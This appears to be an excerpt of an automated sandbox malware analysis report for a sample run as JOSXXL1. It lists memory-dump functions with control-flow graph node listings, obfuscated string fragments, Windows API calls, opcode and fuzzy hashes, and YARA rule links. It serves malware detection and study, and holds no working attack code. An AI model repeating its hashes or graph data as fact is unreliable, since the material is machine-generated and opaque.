                                                                                                        control_flow_graph 527 1576f1-157725 528 157b54-157b58 527->528 529 15772b-15774e 527->529 530 157b71-157b7f 528->530 531 157b5a-157b6e 528->531 538 157754-157761 529->538 539 1577fc-157800 529->539 535 157b81-157b96 530->535 536 157bf0-157c05 530->536 545 157b9d-157baa 535->545 546 157b98-157b9b 535->546 547 157c07-157c0a 536->547 548 157c0c-157c19 536->548 551 157770 538->551 552 157763-15776e 538->552 542 157802-157810 539->542 543 157848-157851 539->543 542->543 563 157812-15782d 542->563 549 157c67 543->549 550 157857-157861 543->550 553 157bac-157bed 545->553 546->553 554 157c1b-157c56 547->554 548->554 557 157c6c-157c9c 549->557 550->528 555 157867-157870 550->555 558 157772-157774 551->558 552->558 601 157c5d-157c64 554->601 561 157872-157877 555->561 562 15787f-15788b 555->562 584 157cb5-157cbc 557->584 585 157c9e-157cb4 557->585 558->539 565 15777a-1577dc 558->565 561->562 562->557 568 157891-157897 562->568 582 15782f-157839 563->582 583 15783b 563->583 613 1577e2-1577f9 565->613 614 1577de 565->614 570 15789d-1578ad 568->570 571 157b3e-157b42 568->571 580 1578c1-1578c3 570->580 581 1578af-1578bf 570->581 571->549 574 157b48-157b4e 571->574 574->528 574->555 589 1578c6-1578cc 580->589 581->589 590 15783d-15783f 582->590 583->590 589->571 593 1578d2-1578e1 589->593 590->543 594 157841 590->594 599 1578e7 593->599 600 15798f-1579ba call 157538 * 2 593->600 594->543 603 1578ea-1578fb 599->603 617 157aa4-157abe 600->617 618 1579c0-1579c4 600->618 603->557 606 157901-157913 603->606 606->557 609 157919-157931 606->609 671 157933 call 158055 609->671 672 157933 call 157ed5 609->672 673 157933 call 157f35 609->673 674 157933 call 157f54 609->674 675 157933 call 157ed1 609->675 676 157933 call 157f31 609->676 677 157933 call 157ef0 609->677 678 157933 call 157f3d 609->678 679 157933 call 157f39 609->679 680 157933 call 1580d8 609->680 681 157933 call 157f64 609->681 682 157933 call 157fa4 609->682 683 157933 call 157fe4 609->683 684 157933 call 157ecd 609->684 685 157933 call 157ec9 609->685 612 157939-157949 612->571 616 15794f-157952 612->616 613->539 614->613 619 157954-15795a 616->619 620 15795c-15795f 616->620 617->528 644 157ac4-157ac8 617->644 618->571 622 1579ca-1579ce 618->622 619->620 623 157965-157968 619->623 620->549 620->623 627 1579f6-1579fc 622->627 628 1579d0-1579dd 622->628 624 157970-157973 623->624 625 15796a-15796e 623->625 624->549 629 157979-15797d 624->629 625->624 625->629 630 157a37-157a3d 627->630 631 1579fe-157a02 627->631 640 1579ec 628->640 641 1579df-1579ea 628->641 629->549 632 157983-157989 629->632 634 157a3f-157a43 630->634 635 157a49-157a4f 630->635 631->630 633 157a04-157a0d 631->633 632->600 632->603 642 157a1c-157a32 633->642 643 157a0f-157a14 633->643 634->601 634->635 638 157a51-157a55 635->638 639 157a5b-157a5d 635->639 638->571 638->639 647 157a92-157a94 639->647 648 157a5f-157a68 639->648 649 1579ee-1579f0 640->649 641->649 642->571 643->642 645 157b04-157b08 644->645 646 157aca-157ad4 call 1563e0 644->646 645->601 656 157b0e-157b12 645->656 646->645 659 157ad6-157aeb 646->659 647->571 654 157a9a-157aa1 647->654 652 157a77-157a8d 648->652 653 157a6a-157a6f 648->653 649->571 649->627 652->571 653->652 656->601 658 157b18-157b25 656->658 662 157b34 658->662 663 157b27-157b32 658->663 659->645 668 157aed-157b02 659->668 665 157b36-157b38 662->665 663->665 665->571 665->601 668->528 668->645 671->612 672->612 673->612 674->612 675->612 676->612 677->612 678->612 679->612 680->612 681->612 682->612 683->612 684->612 685->612
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (okq$(okq$(okq$(okq$(okq$(okq$,oq$,oq
                                                                                                        • API String ID: 0-2636989756
                                                                                                        • Opcode ID: fa3ad30cfc4e4ec6b1516b1b952153731c4deedb12ab3b0ba7e86b54742cbf09
                                                                                                        • Instruction ID: f47590ce0cb0bc8d64607b69bd241927ba4803401bce04a75799c0a2fa9c651c
                                                                                                        • Opcode Fuzzy Hash: fa3ad30cfc4e4ec6b1516b1b952153731c4deedb12ab3b0ba7e86b54742cbf09
                                                                                                        • Instruction Fuzzy Hash: 1D126B30A04205CFCB15CF68E985AAEBBF2FF49315F158599E8299B3A1D730ED49CB50
                                                                                                        Function 39693FE8 Relevance: 9.2, Strings: 7, Instructions: 406COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 686 39693fe8-39693ff1 687 39693ffa-39693ffd 686->687 688 39693ff3-39693ff8 686->688 690 39693fff-39694004 687->690 691 39694006-39694009 687->691 689 39694032-39694035 688->689 690->689 692 3969400b-39694010 691->692 693 39694012-39694015 691->693 692->689 694 3969401e-39694021 693->694 695 39694017-3969401c 693->695 696 3969402a-3969402d 694->696 697 39694023-39694028 694->697 695->689 698 3969402f 696->698 699 39694036-396940a6 696->699 697->689 698->689 706 396940ab-396940ba call 39693f90 699->706 709 396940bc-396940d7 706->709 710 39694103-39694106 706->710 709->710 723 396940d9-396940dd 709->723 711 39694108-3969410e 710->711 712 3969411c-3969414b 710->712 711->706 713 39694110 711->713 717 3969414d-39694150 712->717 718 39694157-3969415d 712->718 715 39694112-39694119 713->715 717->718 720 39694152-39694155 717->720 721 3969415f-39694162 718->721 722 39694171-396941a5 718->722 720->718 724 396941a8-39694200 720->724 721->722 725 39694164-39694166 721->725 726 396940df-396940e4 723->726 727 396940e6-396940ef 723->727 733 39694207-39694287 724->733 725->722 730 39694168-3969416b 725->730 726->715 727->710 728 396940f1-396940fa 727->728 728->710 731 396940fc-39694101 728->731 730->722 730->733 731->715 751 39694289-3969428d 733->751 752 396942a7-396942cc 733->752 791 39694290 call 39693fe8 751->791 792 39694290 call 39694088 751->792 793 39694290 call 39694351 751->793 794 39694290 call 39694385 751->794 795 39694290 call 39693fd7 751->795 757 396942ce-396942fd 752->757 758 39694303-39694306 752->758 754 39694293-396942a4 763 39694308-39694311 757->763 764 396942ff 757->764 759 39694323-3969432c 758->759 761 396943c0-396943c7 call 396944cf 759->761 762 39694332-3969434f 759->762 765 396943cd-396943e9 761->765 762->765 766 3969431c 763->766 767 39694313-3969431a 763->767 764->758 771 396943eb-396943ee 765->771 772 396943f0-3969444a 765->772 766->759 767->759 771->772 773 39694452-3969445b 771->773 772->773 774 3969445d-39694460 773->774 775 39694462-39694498 773->775 774->775 777 396944c7-396944cd 774->777 775->777 786 3969449a-396944bf 775->786 786->777 791->754 792->754 793->754 794->754 795->754
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 'A7U$'A7U$8pq$Hoq$Hoq$Hoq$TJpq
                                                                                                        • API String ID: 0-4035071452
                                                                                                        • Opcode ID: fdad26b1de3777aee2dedac29c047e38c971179e935647c6d9009acb96622364
                                                                                                        • Instruction ID: b14d8eb554fb794964d8c4ae570fb41fa5dc0bf8c44a484a986f5c1bbe1e0055
                                                                                                        • Opcode Fuzzy Hash: fdad26b1de3777aee2dedac29c047e38c971179e935647c6d9009acb96622364
                                                                                                        • Instruction Fuzzy Hash: 22D11534B052148FDB04DF68C491AEE7BB6FF89360F14416AE505EB3A1CA35EC46CB92
                                                                                                        Function 39693A50 Relevance: 7.7, Strings: 6, Instructions: 229COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1443 39693a50-39693a97 1447 39693a9d-39693a9f 1443->1447 1448 39693c73-39693c7e 1443->1448 1449 39693c85-39693c90 1447->1449 1450 39693aa5-39693aa9 1447->1450 1448->1449 1455 39693c97-39693ca2 1449->1455 1450->1449 1451 39693aaf-39693ae7 1450->1451 1451->1455 1464 39693aed-39693af1 1451->1464 1459 39693ca9-39693cb4 1455->1459 1463 39693cbb-39693ce7 1459->1463 1499 39693cee-39693d1a 1463->1499 1465 39693afd-39693b01 1464->1465 1466 39693af3-39693af7 1464->1466 1468 39693b0c-39693b10 1465->1468 1469 39693b03-39693b0a 1465->1469 1466->1459 1466->1465 1470 39693b28-39693b2c 1468->1470 1471 39693b12-39693b16 1468->1471 1469->1470 1474 39693b2e-39693b30 1470->1474 1475 39693b33-39693b3a 1470->1475 1472 39693b18-39693b1f 1471->1472 1473 39693b21 1471->1473 1472->1470 1473->1470 1474->1475 1477 39693b3c 1475->1477 1478 39693b43-39693b47 1475->1478 1477->1478 1479 39693bf8-39693bfb 1477->1479 1480 39693c61-39693c6c 1477->1480 1481 39693bc5-39693bc8 1477->1481 1482 39693b96-39693b99 1477->1482 1483 39693b4d-39693b51 1478->1483 1484 39693c26-39693c29 1478->1484 1486 39693bfd 1479->1486 1487 39693c02-39693c21 1479->1487 1480->1448 1493 39693bca-39693bcd 1481->1493 1494 39693bd3-39693bf6 1481->1494 1488 39693b9b-39693b9e 1482->1488 1489 39693ba4-39693bc3 1482->1489 1483->1480 1490 39693b57-39693b5a 1483->1490 1491 39693c39-39693c5c 1484->1491 1492 39693c2b-39693c2e 1484->1492 1486->1487 1513 39693b7f-39693b83 1487->1513 1488->1463 1488->1489 1489->1513 1496 39693b5c 1490->1496 1497 39693b61-39693b7d 1490->1497 1491->1513 1492->1491 1498 39693c30-39693c33 1492->1498 1493->1494 1493->1499 1494->1513 1496->1497 1497->1513 1498->1491 1503 39693d21-39693d5d 1498->1503 1499->1503 1523 39693b86 call 39693fe8 1513->1523 1524 39693b86 call 39694088 1513->1524 1525 39693b86 call 39693fd7 1513->1525 1517 39693b8c-39693b93 1523->1517 1524->1517 1525->1517
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $Hoq$Hoq$Hoq$x4A7$x4A7
                                                                                                        • API String ID: 0-623027639
                                                                                                        • Opcode ID: 6abd3af9359e2b6e65e48e6e275497053f919c83873f38d9993a285b5620367e
                                                                                                        • Instruction ID: 4f78e047b2e7536d3bb6d5269332834633c96968bcab9b88890946dc36ac1d8e
                                                                                                        • Opcode Fuzzy Hash: 6abd3af9359e2b6e65e48e6e275497053f919c83873f38d9993a285b5620367e
                                                                                                        • Instruction Fuzzy Hash: DA81F3347007449BDB15AF3888556AE3AA2EFC9360F204229F526DB3D1CF349D42C796
                                                                                                        Function 00150CA0 Relevance: 6.8, Strings: 5, Instructions: 539COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1526 150ca0-150cc0 1527 150cc7-15105f call 150780 * 14 1526->1527 1528 150cc2 1526->1528 1718 151062 call 152790 1527->1718 1719 151062 call 1527f0 1527->1719 1528->1527 1607 151068-15107d 1721 151080 call 1529d0 1607->1721 1722 151080 call 1529e0 1607->1722 1723 151080 call 153c90 1607->1723 1724 151080 call 153cc0 1607->1724 1725 151080 call 152a69 1607->1725 1609 151086-15108f 1726 151092 call 154285 1609->1726 1727 151092 call 1541a0 1609->1727 1610 151098-15146d call 155362 call 15c19b call 15c468 call 15c738 call 15ca08 call 15ccd8 call 15cfac call 15d278 call 155362 1712 151473 call 15d6d4 1610->1712 1713 151473 call 15d548 1610->1713 1662 151479-1516eb call 15d548 * 15 1693 1516f1-1517aa 1662->1693 1712->1662 1713->1662 1718->1607 1719->1607 1721->1609 1722->1609 1723->1609 1724->1609 1725->1609 1726->1610 1727->1610
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ( E7$((E7$0!E7$LRkq$h-E7
                                                                                                        • API String ID: 0-2900786413
                                                                                                        • Opcode ID: e9f46dd09e99a942c236e4c584ffafaf3c69749ab22db5f95b8c8116d99a4593
                                                                                                        • Instruction ID: b8c6d434ca2a5e9b804684cde0864c625bf8679c5d56bc8bc90ebdb5f857840b
                                                                                                        • Opcode Fuzzy Hash: e9f46dd09e99a942c236e4c584ffafaf3c69749ab22db5f95b8c8116d99a4593
                                                                                                        • Instruction Fuzzy Hash: BC527674A00619CFCB54DF64DD94A9DBBB2FB89301F1045EAD409A7765DB30AE86CF80
                                                                                                        Function 3A849963 Relevance: 6.1, APIs: 4, Instructions: 135threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 3A8499EE
                                                                                                        • GetCurrentThread.KERNEL32 ref: 3A849A2B
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 3A849A68
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 3A849AC1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2975138885.000000003A840000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A840000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a840000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Current$ProcessThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2063062207-0
                                                                                                        • Opcode ID: 52d8780119167797b6d2a07496fe2b3e7c7bf4c40b2e54a9e46708a96bbc4890
                                                                                                        • Instruction ID: 1d77d696364ace37534c3139d179144b1a707f77a91987b62eec46d271bee244
                                                                                                        • Opcode Fuzzy Hash: 52d8780119167797b6d2a07496fe2b3e7c7bf4c40b2e54a9e46708a96bbc4890
                                                                                                        • Instruction Fuzzy Hash: 225146B09043498FDB14CFA9C948BEEFBF1EF49310F20845AE449A7261DB34A985CF65
                                                                                                        Function 3A849970 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 3A8499EE
                                                                                                        • GetCurrentThread.KERNEL32 ref: 3A849A2B
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 3A849A68
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 3A849AC1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2975138885.000000003A840000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A840000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a840000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Current$ProcessThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2063062207-0
                                                                                                        • Opcode ID: 45573eefd052be00c166de8002b2a859b984676f2f640445a33cd21932cded1a
                                                                                                        • Instruction ID: 982ba0ffac9a76d7bc49c989d737d933d40b70d06408eadf8acacc784d60b8ee
                                                                                                        • Opcode Fuzzy Hash: 45573eefd052be00c166de8002b2a859b984676f2f640445a33cd21932cded1a
                                                                                                        • Instruction Fuzzy Hash: D35123B19043498FDB14DFA9C548BEEBBF1EF88310F20C459E459A7260DB38A985CF65
                                                                                                        Function 00158490 Relevance: 3.2, Strings: 2, Instructions: 703COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $kq$$kq
                                                                                                        • API String ID: 0-3550614674
                                                                                                        • Opcode ID: 1bba230f2bbabb0710382ae1b93cfd5cba4da10f954f0789382aa2274baeaa51
                                                                                                        • Instruction ID: e1e9221370c944869af58106ee4637d0595cca378ff1dbffe4e069d3a8193254
                                                                                                        • Opcode Fuzzy Hash: 1bba230f2bbabb0710382ae1b93cfd5cba4da10f954f0789382aa2274baeaa51
                                                                                                        • Instruction Fuzzy Hash: 76522074A00218CFEB14DBA4C950B9EBB77EF84300F1081A9D50A7B3A5CF359E89AF51
                                                                                                        Function 00155F38 Relevance: 2.8, Strings: 2, Instructions: 327COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Hoq$Hoq
                                                                                                        • API String ID: 0-3106737575
                                                                                                        • Opcode ID: da49479f4b09f547fe9d527dc770b47ec29dddf86604b6a7c1128a9be78827f7
                                                                                                        • Instruction ID: 25355ad7de51638fac20362abdab9ecf0743c9821fac7e8957016ff74b42eaf0
                                                                                                        • Opcode Fuzzy Hash: da49479f4b09f547fe9d527dc770b47ec29dddf86604b6a7c1128a9be78827f7
                                                                                                        • Instruction Fuzzy Hash: DFB19E30708214CFCB159F358894B7A7BB6AFC8302F55456AE816CB3A6DB34CC89D791
                                                                                                        Function 00156498 Relevance: 2.7, Strings: 2, Instructions: 232COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ,oq$,oq
                                                                                                        • API String ID: 0-3825397795
                                                                                                        • Opcode ID: 632ac27b746ea70d20c4c003e2d760c4d58dfd5af176b5ec8ae328b53dfe618f
                                                                                                        • Instruction ID: 5f59e603994b751fae5352356ec4e4c0855229cffd9e3bb5854817fad05a9151
                                                                                                        • Opcode Fuzzy Hash: 632ac27b746ea70d20c4c003e2d760c4d58dfd5af176b5ec8ae328b53dfe618f
                                                                                                        • Instruction Fuzzy Hash: FC819F34A40505CFCB18CF69C48496ABBB2BF89312BA58169D825DF375DB31EC49CBE1
                                                                                                        Function 39694351 Relevance: 2.6, Strings: 2, Instructions: 101COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 8pq$TJpq
                                                                                                        • API String ID: 0-1168589435
                                                                                                        • Opcode ID: 4a075f0222fbd8fc3008f453af1187818513f089a5d3957fcb6631483ca62162
                                                                                                        • Instruction ID: 34998dad9e9586ae272a7f22cad7c50cabe40c6985e827e97220c91d989d5096
                                                                                                        • Opcode Fuzzy Hash: 4a075f0222fbd8fc3008f453af1187818513f089a5d3957fcb6631483ca62162
                                                                                                        • Instruction Fuzzy Hash: E9312434B102198FCB00EFA8C581EDDBBB2EF88320F195550E505AB366DA30EC85CB91
                                                                                                        Function 39694385 Relevance: 2.6, Strings: 2, Instructions: 100COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 8pq$TJpq
                                                                                                        • API String ID: 0-1168589435
                                                                                                        • Opcode ID: 6ad8a359f83b7ff8de428c70789f50bd2661a57344ec434ee0be9af9e789dc90
                                                                                                        • Instruction ID: 2354e08a1730ecd3c7a2456033be40c10ee18ed57f3cfd4db847e451d848c0c4
                                                                                                        • Opcode Fuzzy Hash: 6ad8a359f83b7ff8de428c70789f50bd2661a57344ec434ee0be9af9e789dc90
                                                                                                        • Instruction Fuzzy Hash: 02313434B502198FCB00EFA8C581EDDBBB2EF88320F195594E505AB376DA70EC85CB91
                                                                                                        Function 00159D59 Relevance: 2.5, Strings: 2, Instructions: 44COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'kq$4'kq
                                                                                                        • API String ID: 0-4171853269
                                                                                                        • Opcode ID: 1d1249c2b0479d854ec1b329f383754645b37830fd695cc75cd22b3a86debacb
                                                                                                        • Instruction ID: 79d2a7a800597cd9f4bdea8b1d62fc1ad6cc321b12821ac2d995da55728f1040
                                                                                                        • Opcode Fuzzy Hash: 1d1249c2b0479d854ec1b329f383754645b37830fd695cc75cd22b3a86debacb
                                                                                                        • Instruction Fuzzy Hash: A2F04435300118AFDB181BA5985497BBBDBEBC83A1B148429BD0AC7391DF66CC4683A1
                                                                                                        Function 3A934590 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3A9346A2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2975215347.000000003A930000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a930000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 716092398-0
                                                                                                        • Opcode ID: 414ccbd03483b8614ce2280105cd79d607de53437db7d9d65f19498a4f90e7fd
                                                                                                        • Instruction ID: fd66362544c20e22b8edd7d71b7e33e2e181fad72087c7eca2f660aa08a1b3f4
                                                                                                        • Opcode Fuzzy Hash: 414ccbd03483b8614ce2280105cd79d607de53437db7d9d65f19498a4f90e7fd
                                                                                                        • Instruction Fuzzy Hash: 5141C2B5D10309DFDF14CF9AC984ADEBBB5BF88314F61852AE418AB250D7759881CF90
                                                                                                        Function 3A93458F Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3A9346A2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2975215347.000000003A930000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a930000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 716092398-0
                                                                                                        • Opcode ID: 718aee17befee30873c92ae0d8a11e20159c64c2f5b14a526f8e377e7d0d1448
                                                                                                        • Instruction ID: d51d254180fa810967a85eb56cd2018584cbd09690f3d6a42ac92d4883fb66aa
                                                                                                        • Opcode Fuzzy Hash: 718aee17befee30873c92ae0d8a11e20159c64c2f5b14a526f8e377e7d0d1448
                                                                                                        • Instruction Fuzzy Hash: 1C41D2B1D00349DFDF14CF9AC984ADDBBB5BF88314F61812AE418AB250D7719881CF90
                                                                                                        Function 3A933384 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 3A936C11
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2975215347.000000003A930000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a930000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CallProcWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 2714655100-0
                                                                                                        • Opcode ID: 96ced3e15f10a050492010c8b5c6b7d76864c3f53837e1a52d35cab19a85c32d
                                                                                                        • Instruction ID: f21ee553b60683cf5fd0f9d179cfea9222b29f50b5c813cd85fd45f67566c5e8
                                                                                                        • Opcode Fuzzy Hash: 96ced3e15f10a050492010c8b5c6b7d76864c3f53837e1a52d35cab19a85c32d
                                                                                                        • Instruction Fuzzy Hash: C64149B9900305DFDB54CF99C884A9ABBF5FB88314F24C859D618AB361D778A841CFA0
                                                                                                        Function 3A849BB0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3A849C3F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2975138885.000000003A840000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A840000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a840000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DuplicateHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3793708945-0
                                                                                                        • Opcode ID: 9f6f2b42c518385c796d3f48d1e422bc27e95b620a02f8e549592afdfcdb8fac
                                                                                                        • Instruction ID: 03bab3b04080f1ae6d45d246bd20b17edf09b62bd17b1b2b39a654d0b2fd24d2
                                                                                                        • Opcode Fuzzy Hash: 9f6f2b42c518385c796d3f48d1e422bc27e95b620a02f8e549592afdfcdb8fac
                                                                                                        • Instruction Fuzzy Hash: 4A2105B59002599FDB10CFA9D584ADEFFF5EF48320F14841AE954A7350C374A941CF61
                                                                                                        Function 3A849BB8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3A849C3F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2975138885.000000003A840000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A840000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a840000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DuplicateHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3793708945-0
                                                                                                        • Opcode ID: db0d45d84d616d1fdda79d574133e2f213b1a05c4802de6f6b13c3a248efd0e6
                                                                                                        • Instruction ID: a45a103fbdf45c82c524697f8938791168071c68f0603ed9b8aad7260e844f82
                                                                                                        • Opcode Fuzzy Hash: db0d45d84d616d1fdda79d574133e2f213b1a05c4802de6f6b13c3a248efd0e6
                                                                                                        • Instruction Fuzzy Hash: 1121D5B59042589FDB10CFAAD584ADEFFF4EB48320F14841AE958A7310D374A944DFA5
                                                                                                        Function 3A938288 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • OleInitialize.OLE32(00000000), ref: 3A9390ED
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2975215347.000000003A930000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a930000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Initialize
                                                                                                        • String ID:
                                                                                                        • API String ID: 2538663250-0
                                                                                                        • Opcode ID: c70db84c0d201a587f6f2eda97c295523c5897ce31b8c791f46572bccce0cc59
                                                                                                        • Instruction ID: b08c3d36dcc700ff57f1f4236a15efce1d8293eb1d18358fe3a250bf0533f474
                                                                                                        • Opcode Fuzzy Hash: c70db84c0d201a587f6f2eda97c295523c5897ce31b8c791f46572bccce0cc59
                                                                                                        • Instruction Fuzzy Hash: EA1145B19003088FCB20DFAAC584BCEBBF8EB48320F108419D558B7310C379A940CFA5
                                                                                                        Function 3A939097 Relevance: 1.5, APIs: 1, Instructions: 43comCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • OleInitialize.OLE32(00000000), ref: 3A9390ED
                                                                                                        Memory Dump Source
